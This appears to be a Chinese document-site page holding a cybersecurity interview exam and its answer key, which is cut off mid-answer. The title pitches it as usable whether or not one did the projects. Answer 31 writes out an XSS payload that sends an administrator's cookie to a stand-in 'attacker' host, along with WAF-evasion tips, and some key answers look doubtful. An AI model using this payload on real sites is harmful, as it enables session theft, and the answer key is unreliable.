2022網安面試常問項目題答案模板 不管做沒做過都能套_第1頁
2022網安面試常問項目題答案模板 不管做沒做過都能套_第2頁
2022網安面試常問項目題答案模板 不管做沒做過都能套_第3頁
2022網安面試常問項目題答案模板 不管做沒做過都能套_第4頁
2022網安面試常問項目題答案模板 不管做沒做過都能套_第5頁
已閱讀5頁,還剩4頁未讀 繼續免費閱讀

付費下載

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

2022網安面試常問項目題答案模板不管做沒做過都能套

一、單項選擇題(每題2分,共20分)1.在Web滲透測試項目中,若目標站點使用JWT作為會話令牌,以下哪項操作最能直接驗證“密鑰硬編碼”漏洞是否存在A.修改JWT的alg為none后重放請求B.使用BurpSequencer測試隨機性C.用公鑰作為HMAC密鑰重新簽名令牌D.暴力破解JWT的iss字段2.甲方SDL流程中,哪一階段最適合引入“源碼成分分析SCA”以阻斷開源組件風險A.需求評審B.編碼完成后系統測試C.安全驗收D.設計評審3.對生產網進行紅隊演練時,為降低對業務影響,最先應取得的文檔是A.網絡拓撲圖B.業務連續性預案C.數據分類分級清單D.變更管理記錄4.在零信任架構項目中,為終端設備建立“動態信任分數”最不可能用到的數據源A.EDR上傳的進程哈希B.CMDB里的資產責任人C.802.1X認證日志D.威脅情報平臺IP信譽5.對容器集群做安全基線核查,以下哪條CISDockerBenchmark檢查項與鏡像無關A.確保docker.service文件權限為644B.確保容器以只讀文件系統運行C.確保dockersocket不被掛載到容器D.確保使用內容信任的鏡像簽名6.在數據安全分類分級項目中,將“客戶身份證照片”定為最高敏感級,主要依據的國家標準是A.GB/T22239-2019B.GB/T35273-2020C.GB/T37918-2019D.GB/T25070-20197.對工業控制網絡進行資產發現,采用被動流量指紋方式,最大優點A.不引入額外掃描流量B.可識別PLC固件版本C.支持跨網段路由D.提供漏洞利用腳本8.在攻防演練復盤報告中,為體現“攻擊鏈還原”,最優先展示A.漏洞CVE編號B.時間線與權限變化C.木馬C2通信加密密鑰D.防守方攔截規則9.云原生WAF與傳統硬件WAF相比,在項目中常被詬病的短板A.缺少IPv6支持B.無法解密TLS1.3C.在大流量場景下延遲高D.缺少機器學習模型10.在個人信息合規審計項目里,確認“最小必要”原則落地,最關鍵證據A.隱私政策更新記錄B.數據字段與業務功能映射表C.用戶注銷流程截圖D.第三方SDK協議二、填空題(每題2分,共20分)11.在等保2.0三級系統中,安全區域邊界要求對“________”和“________”實現雙向訪問控制。12.對Kubernetes集群做RBAC審計時,默認最高權限角色是________。13.在威脅建模STRIDE中,Spoofing對應的中文攻擊場景常稱為________。14.若使用OWASPZAP掃描API,需先導入________文件以保證接口覆蓋率。15.對Windows域環境進行權限維持,常利用的注冊表鍵值位于________。16.在數據脫敏項目中,若采用k-匿名模型,當k=5時表示等價類中最少包含________條記錄。17.對公網暴露的Elasticsearch集群,默認可通過________端口直接訪問。18.在SDL代碼審計階段,發現硬編碼密碼,應首先在________平臺錄入缺陷并跟蹤。19.對物聯網固件提取文件系統,常用binwalk的“-e”參數,其作用是________。20.在零信任網絡中,持續信任評估引擎的英文縮寫常寫作________。三、判斷題(每題2分,共20分)21.在攻防演練中,紅隊使用DNS隧道一定需要控制目標內網的DNS服務器。22.對容器鏡像進行簽名后,DockerDaemon會自動驗證簽名才允許運行。23.在等級保護測評中,若系統未存儲個人信息,則無需做個人信息影響評估。24.使用Wireshark抓取HTTPS流量,只要擁有服務器私鑰即可解密所有會話。25.對工控協議ModbusTCP做模糊測試時,修改功能碼0x05可能觸發PLC輸出點動作。26.在云安全責任共擔模型中,IaaS層操作系統補丁由云服務商負責。27.對AndroidAPP做動態調試時,開啟android:debuggable="true"即可在任意進程下斷點。28.在數據跨境評估中,只要數據加密后即可自由出境,無需額外審批。29.對Windows日志進行取證,事件ID4624表示賬戶登錄成功。30.在漏洞掃描報告中,出現“TLS1.0啟用”屬于高危漏洞,必須立即下線業務。四、簡答題(每題5分,共20分)31.描述一次真實的Web滲透測試項目中,如何證明存儲型XSS漏洞被成功利用并獲取管理員Cookie,同時不觸發WAF。32.在零信任落地項目中,如何向業務部門解釋“持續認證”不會影響用戶體驗,并給出技術緩解方案。33.說明在對容器云平臺做安全基線檢查時,如何快速定位“特權容器”并給出整改命令。34.概述數據安全分類分級項目中,如何建立“數據流轉地圖”并確保與業務方共識。五、討論題(每題5分,共20分)35.某金融公司計劃將核心賬務系統遷移至公有云,討論其在做威脅建模時應重點關注的三個新增風險點及對應緩解措施。36.紅隊演練結束后,防守方提出“攻擊流量完全加密,無法檢測”,請討論如何設計一套基于行為的無解密檢測方案。37.面對Log4j2突發漏洞,討論企業在節假日無人值守情況下的應急響應流程如何做到兩小時內完成互聯網邊界風險止血。38.在個人信息保護法實施背景下,討論SDK合規審計中如何驗證“第三方SDK實際采集字段”與“隱私政策披露字段”一致。答案與解析一、單項選擇題1.C2.D3.B4.B5.A6.C7.A8.B9.C10.B二、填空題11.可信網絡區域,不可信網絡區域12.cluster-admin13.身份偽造14.OpenAPI/Swagger15.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run16.517.920018.Jira/缺陷管理系統19.提取固件內嵌的文件系統20.CTE三、判斷題21.×22.×23.×24.×25.√26.×27.√28.×29.√30.×四、簡答題31.在測試階段先定位留言板輸入點,使用雙寫與大小寫混合繞過前端過濾,插入<svgonload=fetch(`//attacker/`+document.cookie)>,利用瀏覽器夜間自動觸發,通過VPS日志獲得管理員Cookie,全程使用分塊傳輸編碼并降低請求頻率,規避基于正則的WAF。32.采用風險自適應引擎,對低危操作保持長周期Cookie,對轉賬等高危操作再彈二次認證;后臺用設備指紋與行為基線比對,異常時無縫拉起FIDO2指紋驗證,平均延遲<300ms,用戶無感知。33.通過kubectlgetpods--all-namespaces-ojson|jq-r'.items[]|select(.spec.securityContext.privileged==true)|.'定位,整改命令為kubectlpatchdeploymentNAME-p'{"spec":{"template":{"spec":{"containers":[{"name":"CONTAINER","securityContext":{"privileged":false}}]}}}}'。34.先拉取CMDB、API網關日志、數據庫審計日志,用字段級血緣工具自動解析,再召開三輪業務訪談確認標注,最終輸出Excel+可視化流向圖,由業務負責人簽字鎖定版本,季度復查。五、討論題35.新增風險:1.多租戶隔離失效,采用云原生微隔離與加密隧道;2.云API密鑰泄露,引入KMS與臨時憑證;3.合規數據跨境,采用專屬可用區+國密算法加密,簽署SCC條款。36.基于eBPF采集TLS指紋、JA3/JA3S、流統計特征,用無監督聚類發現異常長連接;結合DNS時序與進程樹,訓練孤立森林模型,無需解密即可告

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業或盈利用途。
  • 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論